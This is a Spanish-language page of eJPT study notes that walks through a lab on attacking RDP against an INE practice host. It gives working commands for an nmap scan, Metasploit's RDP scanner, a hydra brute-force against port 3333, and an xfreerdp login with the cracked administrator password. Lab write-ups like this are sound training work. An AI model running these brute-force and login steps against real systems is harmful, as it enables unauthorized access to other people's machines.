> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/ejpt-notes/pruebas-de-penetracion-de-host-y-red/ataques-basados-en-sistema-host/windows/explotacion-de-vulnerabilidades-de-windows/explotacion-de-rdp.md).

# Explotación de RDP

## 🖥️ ¿Qué es RDP?

* **RDP (Remote Desktop Protocol)** es un protocolo de acceso remoto con interfaz gráfica, desarrollado por **Microsoft**, que permite conectarse y controlar remotamente un sistema **Windows**.
* Por defecto, **RDP utiliza el puerto TCP 3389**, aunque puede ser configurado para escuchar en cualquier otro puerto TCP.

***

## 🔐 Autenticación en RDP

* Para autenticarse vía RDP, se necesita una **cuenta legítima del sistema objetivo** y la **contraseña en texto claro** del usuario.

***

## 🧨 Ataques de fuerza bruta RDP

* Podemos realizar un **ataque de fuerza bruta** sobre RDP con herramientas como `hydra` o `ncrack` para descubrir combinaciones válidas de usuario y contraseña.
* Una vez obtenidas, se puede **acceder remotamente** al sistema objetivo con un cliente RDP como `xfreerdp` o `rdesktop`.

***

## 🧪Laboratorio Práctico

#### Paso 1: Acceso al laboratorio

Abre el enlace del laboratorio para acceder a la máquina Kali.

<figure><img src="/files/nz7g6hS9qmeys9sPrLWH" alt=""><figcaption></figcaption></figure>

***

#### Paso 2: Verificar conectividad con la máquina de destino

```bash
ping -c 4 demo.ine.local
```

\
✅ Los objetivos son alcanzables.

***

#### Paso 3: Escaneo de puertos con Nmap

Realizamos un escaneo de detección de versión de servicios para identificar puertos abiertos:

```bash
nmap -sV demo.ine.local
```

<figure><img src="/files/SlqHQ3o4zJMhmEXWfkDd" alt=""><figcaption></figcaption></figure>

\
Se han descubierto varios puertos abiertos.

***

#### Paso 4: Identificar puerto RDP no estándar

Aunque el puerto 3389 (RDP por defecto) no está abierto, observamos el puerto **3333** expuesto. Para verificar si este puerto aloja el servicio RDP, usamos el módulo auxiliar de Metasploit:

```bash
msfconsole
use auxiliary/scanner/rdp/rdp_scanner
set RHOSTS demo.ine.local
set RPORT 3333
exploit
```

<figure><img src="/files/vA9byvJLU86XIfYqKpiH" alt=""><figcaption></figcaption></figure>

\
✅ Se confirma que el puerto 3333 corresponde a RDP.

***

#### Paso 5: Ataque de fuerza bruta con Hydra

Usamos `hydra` para identificar combinaciones válidas de usuarios y contraseñas:

```bash
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://demo.ine.local -s 3333
```

<figure><img src="/files/nf6216ZaOcRSrwzbjSac" alt=""><figcaption></figcaption></figure>

💡 *Después del ataque, espera unos 30-40 segundos antes de conectarte vía RDP.*

***

#### Paso 6: Conexión remota con xfreerdp

Una vez identificadas credenciales válidas, nos conectamos al sistema remoto:

```bash
xfreerdp /u:administrator /p:qwertyuiop /v:demo.ine.local:3333
```

<figure><img src="/files/Bd4kGacvMnhrHYrwyNfJ" alt=""><figcaption></figcaption></figure>

📂 Navega a: **Mi PC → C:\\**

<figure><img src="/files/qxYDay7jl75vQVVHb94b" alt=""><figcaption></figcaption></figure>

📄 Abre el archivo de bandera.

<figure><img src="/files/tWURt3226pKXtNfx7o6Y" alt=""><figcaption></figcaption></figure>

***

#### 🏁 Bandera

<figure><img src="/files/1zECH24hXp99ZFtvAY4h" alt=""><figcaption></figcaption></figure>

**Bandera: número de puerto 3333**

***

#### 🧩 Conclusión

Este laboratorio demuestra:

* Cómo identificar puertos RDP no estándar con Nmap y Metasploit.
* Cómo realizar un ataque de fuerza bruta exitoso con Hydra.
* Cómo conectarse remotamente a un sistema Windows usando credenciales obtenidas y `xfreerdp`.
